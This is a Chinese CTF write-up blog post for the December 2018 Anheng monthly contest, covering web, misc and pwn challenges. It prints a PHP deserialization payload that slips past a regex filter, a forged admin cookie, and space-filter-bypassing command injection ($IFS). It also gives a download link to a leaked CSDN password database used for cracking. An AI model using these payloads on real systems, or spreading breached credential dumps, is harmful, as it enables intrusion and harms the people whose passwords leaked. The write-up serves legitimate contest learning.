安恒月赛WriteUp-2018.12

最新推荐文章于 2022-07-29 21:39:14 发布
最新推荐文章于 2022-07-29 21:39:14 发布
阅读量2.8k 收藏 5
点赞数 3
分类专栏: 信息安全 记录 CTF/AWD
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q851579181q/article/details/85218687
版权
信息安全 同时被 3 个专栏收录
17 篇文章 1 订阅
订阅专栏
记录
14 篇文章 0 订阅
订阅专栏
CTF/AWD
9 篇文章 3 订阅
订阅专栏

安恒月赛WriteUp2018-12月

 

WEB1-easy:

web1反序列化

 

一打开就显示了源代码: 

<?php  

@error_reporting(1);

include 'flag.php';

class baby

{   

    public $file;

    function __toString()      

    {          

        if(isset($this->file))

        {

            $filename = "./{$this->file}";        

            if (file_get_contents($filename))         

            {              

                return file_get_contents($filename);

            }

        }     

    }  

}  

if (isset($_GET['data']))  

{

    $data = $_GET['data'];

    preg_match('/[oc]:\d+:/i',$data,$matches);

    if(count($matches))

    {

        die('Hacker!');

    }

    else

    {

        $good = unserialize($data);

        echo $good;

    }     

}

else

{

    highlight_file("./index.php");

}

?>

 

 

自带一个baby类,里面__toString() 中可以用file_get_contents读文件内容:

可以自己本地来测试一下,获取序列化的对象。

<?php  

include 'flag.php';

class baby

{   

    public $file;

    function __toString()      

    {          

        if(isset($this->file))

        {

            $filename = "./{$this->file}";        

            if (file_get_contents($filename))         

            {              

                return file_get_contents($filename);

            }

        }     

    }  

}  



$a = new baby();

$a -> file = "flag.php";

//echo $a->__toString();



echo serialize($a);



?>

 

得到:

O:4:"baby":1:{s:4:"file";s:8:"flag.php";}

 

因为存在过滤出语句

preg_match('/[oc]:\d+:/i',$data,$matches);

 

所以需要绕过,用加号:

O:+4:"baby":1:{s:4:"file";s:8:"flag.php";}

 

但如果直接传值的话会,服务器接收到会把加号认为空格,所以要对加号url编码:

 

O:%2b4:"baby":1:{s:4:"file";s:8:"flag.php";}

 

http://101.71.29.5:10007/index.php?data=O:%2b4:"baby":1:{s:4:"file";s:8:"flag.php";}

访问后查看源代码得到:

// $flag = 'flag{ad2328a2c3f0933c053fd3c6f28f6143}';

 

 

 

web2-ezweb2

访问主页的同时,更改cookie字段为admin的base64值:user=YWRtaW4%3D

然后会获得admin的session的进行跳转,同时仍旧要更改cookie为user=YWRtaW4%3D

 

跳转后可以执行命令,但过滤了空格,可绕过,参考:

http://www.itdaan.com/blog/2016/07/14/92caabad181349c513e271d1ff595fee.html

 

ls$IFS/  查看根目录, 发现ffLAG_404文件

cat$IFS/ffLAG_404  

得到:flag{6f1d95159e3b90ed28186c518dd15e8c}

 

 

 

MISC1-变换的指纹:

下载到社工库:ed2k://|file|www.csdn.net.sql|287238395|7C81CC2A2B57411BD107ACFF2BA8DDEE|/ 

提取密码进行爆破,正确密码是双引号中的内容:“!(()!@)6125dou ”,注意密码结尾有个空格。 通过图片获得

23685 28276158 52365 72716835687172857481317

23685528276158852365572716835687172857481317字符串

因为提示8进制:

[23,70,55,30,27,61,60,105,23,65,57,27,16,103,56,107,17,30,57,50,13,17]

尝试进行ascii移位等转换,没有发现flag..... 还差最后一步,没有时间了,尴尬....

 

 

MISC2-签到:

关注公众号,回复flag,回复蜗牛即可。

 

 

MISC3-学习资料:

这是ZIP的明文攻击,可以参考我之前的博客:

https://blog.csdn.net/q851579181q/article/details/84944900

 

有个注意点,月赛群里兄有些弟说没爆破出来可能是用ARCHPR4.5.4进行的爆破,该版本进行明文攻击会有问题,建议使用ARCHPR4.5.3 ,另外使用不同的压缩软件压缩备忘录.txt也会导致最后无法找到明文,详情见上述链接。

密码是:1qazmko098

解压后是个word,在选项设置中设置显示隐藏的字符串,再移开图片,就看见flag了。也可以吧docx的改后缀为zip,解压后在/word/document.xml里可见flag.

 

flag{edaa144c91a4e5b817e4a18cbdb78879}

 

 

MISC4-juju

改宽高,可参考:https://blog.csdn.net/CliffordR/article/details/81123232

把高拉长。

 

 

 

 

这一串是base32加密,解码可得a213072327f762855e475779eb081ca3

 

 

 

BlockChain:

区块链找到了类似的题目:https://www.anquanke.com/post/id/168037

不过来不及做了。

 

 

 

pwn1-messageb0x  

 

 

 

洞在此处,还有一点:

 

函数的汇编是这样的,我不确定ida里给的偏移是否正确,在peda中好探测

gdb调试:

 

 

 

 

b *0x080492e2

 

 

r:

 

 

 

92:

 

 

 

思路:

没有在程序中发现system函数,也没有/bin/sh 

 

1.没有system,选择用int80来做:

 

 ROPgadget --binary messageb0x | grep "int 0x80":

 

没有找到:

 

/bin/sh:

 

也木有

 

换思路:

 

 

1.泄露puts函数地址

2.获取libc版本号

3.获取/bin/sh地址

4.payload:

 

得到:

flag{88a489d281af671c4d79d31d47280123}

 

 

这里个人感觉有些小坑,刚开始ret用的main的,但是打exp卡住,后来看函数汇编:

 

 

 

不是leave;ret的,构造的main rop打不了,后来换了process_info,绕过了main的 ret,打成功了,记得要常看代码的汇编。。。。

Blus.King
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2018-10月安恒逆向题目
10-29
2018年10月安恒月逆向题目。
ctf密码学总结
Reset
11-05 1万+
自己做题总结的小知识点。 1.RSA 公钥标准文件的后缀是  .pem 加密过程  选择两个大素数p和q,计算出模数N = p * q  计算φ = (p−1) * (q−1) 即N的欧拉函数,然后选择一个e (1&lt;e&lt;φ),且e和φ互质  取e的模反数为d,计算方法: e * d ≡ 1 (mod φ)  对明文m进行加密:c≡m^e (mod n) 或 c = pow(...
[CTF]BUUCTF_变异凯撒CTF题库-密码学Crypto
十二_的博客
07-29 1584
加密密文link";
安恒月writeup 2018年12月
SsMing的博客
12-23 1440
目录 misc1 misc2(签到) misc3 (学习资料) misc4(JUJU) web1 web2 pwn1 misc和web,和一道pwn misc1 看提示想到去下当时泄露的库 然后写脚本处理一下把数据库的内容,生成三个由用户名,密码,邮箱组成的字典,使用密码组成的字典爆开了压缩包 解压后得到个动图,记录上面的数字得到236855282761588523...
web安全-PHP反序列化漏洞
weixin_61956136的博客
07-10 2048
web安全-PHP反序列化漏洞
2019安恒月7月-MISC wp
qwzf
07-16 3194
安恒月7月-MISC wp 前言 今天安恒月,和最近一部热剧有一点点关系。而我就做出了两道MISC题,还是写一下Write Up。。。。 MISC1:真正的CTFer在哪?! 下载解压题目文件,发现一张图片 用binwalk分析一下,并没有隐藏文件 查看图片详细信息,没有隐藏东西。然后看了下图片宽高(分辨率),并用winHex打开发现,高度不一致 将分辨率转换成16进制,0500应...
20210413-东北证券-安恒信息-688023-云安全龙头厂商,充分受益行业高景气.pdf
04-14
20210413-东北证券-安恒信息-688023-云安全龙头厂商,充分受益行业高景气.pdf
20200310-天风证券-安恒信息-688023-新安全领军企业,收入有望持续高增长.pdf
06-19
20200310-天风证券-安恒信息-688023-新安全领军企业,收入有望持续高增长.pdf
计算机行业:科创板询价报告之安恒信息-1017-华鑫证券-18页.pdf
07-23
计算机行业:科创板询价报告之安恒信息-1017-华鑫证券-18页.pdf
计算机行业:信息安全行业科创板公司,安恒信息-0705-东方证券-20页.pdf
07-23
计算机行业:信息安全行业科创板公司,安恒信息-0705-东方证券-20页.pdf
安恒12月Web题解
0verWatch的博客
12-22 2857
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
CTF-安恒18年十二月月部分writeup
weixin_34255055的博客
12-22 643
CTF-安恒十二月月部分writeup 这次题目都比较简单蛤,连我这菜鸡都能做几道。 WEB1-ezweb2 打开网站,啥也没有,审计源代码,还是啥都没有,也没什么功能菜单,扫了一下目录,扫到了admin.php,但是提示:你不是管理员。好吧,抓个包看看 解一下码--: 将user改为admin,发现直接跳转到了admin.php页面。 这个框试了一下是可以执行命...
2019安恒杯一月新春贺岁writeup
筱阳的博客
01-27 4174
Simple php http://101.71.29.5:10004/robots.txt http://101.71.29.5:10004/admin ThinkPHP3.2.3 http://101.71.29.5:10004/index.php?username[0]=bind&amp;amp;amp;amp;amp;amp;amp;username[1]=0 and updatexml(1,concat(0x7,user(),0x7...
CTF-练习平台 Web writeup By Assassin [暂时完结]
Assassin
04-06 6万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
PHP反序列化笔记
Ms08067安全实验室
01-20 1257
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀目录目录private变量与protected变量序列化后的特点序列化后的字段长度前面可以加+题目解题步骤CVE-2016-712...
网络安全实验室CTF练习部分题目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
浅谈PHP反序列化漏洞原理
r0cky的博客
09-18 582
序列化与反序列化 序列化用途:方便于对象在网络中的传输和存储 0x01 php反序列化漏洞 在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 序列化就是将对象转换为流,利于储存和传输的格式 反序列化与序列化相反,将流转换为对象 例如:json序列化、XML序列化、二进制序列化、SO...
安恒明御安全网关文件上传
最新发布
09-01
根据提供的引用资料,安恒明御安全网关中存在文件上传漏洞。具体来说,该漏洞允许攻击者通过执行命令上传恶意文件到安恒明御安全网关上。由于没有给出具体的文件上传漏洞的细节,我无法提供更多的信息。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值